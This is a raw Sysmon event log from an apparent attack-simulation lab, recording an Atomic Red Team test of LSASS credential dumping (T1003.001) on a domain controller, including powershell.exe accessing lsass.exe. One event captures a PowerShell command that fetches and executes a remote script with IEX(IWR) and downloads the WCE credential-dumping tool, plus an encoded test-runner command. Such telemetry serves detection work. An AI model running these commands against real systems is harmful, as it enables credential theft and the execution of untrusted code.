15:52:46.837{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004269Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.837{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004268Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.837{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004267Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.837{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004266Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.837{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004265Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.837{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CCE-5FA1-D500-000000008801}2212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004264Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.837{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CCE-5FA1-D500-000000008801}2212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004263Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.842{D28789B6-7CCE-5FA1-D500-000000008801}2212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$parentpath = Split-Path \""C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe\""; $zippath = \""$parentpath\wce.zip\"" IEX(IWR \""https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1\"") if(Invoke-WebRequestVerifyHash \""https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip\"" \""$zippath\"" 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933){ Expand-Archive $zippath $parentpath\wce -Force Move-Item $parentpath\wce\wce.exe \""C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe\"" Remove-Item $zippath, $parentpath\wce -Recurse }} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004262Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.696{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CCE-5FA1-D400-000000008801}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004261Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.696{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CCE-5FA1-D400-000000008801}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004260Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.649{D28789B6-7CCE-5FA1-D400-000000008801}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_b02gpntc.05p.ps12020-11-03 15:52:46.649 10341000x80000000000000004259Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.634{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CCE-5FA1-D400-000000008801}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004258Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.618{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CCE-5FA1-D400-000000008801}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004257Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.618{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CCE-5FA1-D400-000000008801}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004256Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.618{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004255Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.618{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004254Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.618{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004253Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.618{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004252Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.618{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004251Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.618{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004250Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.618{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004249Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.618{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004248Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 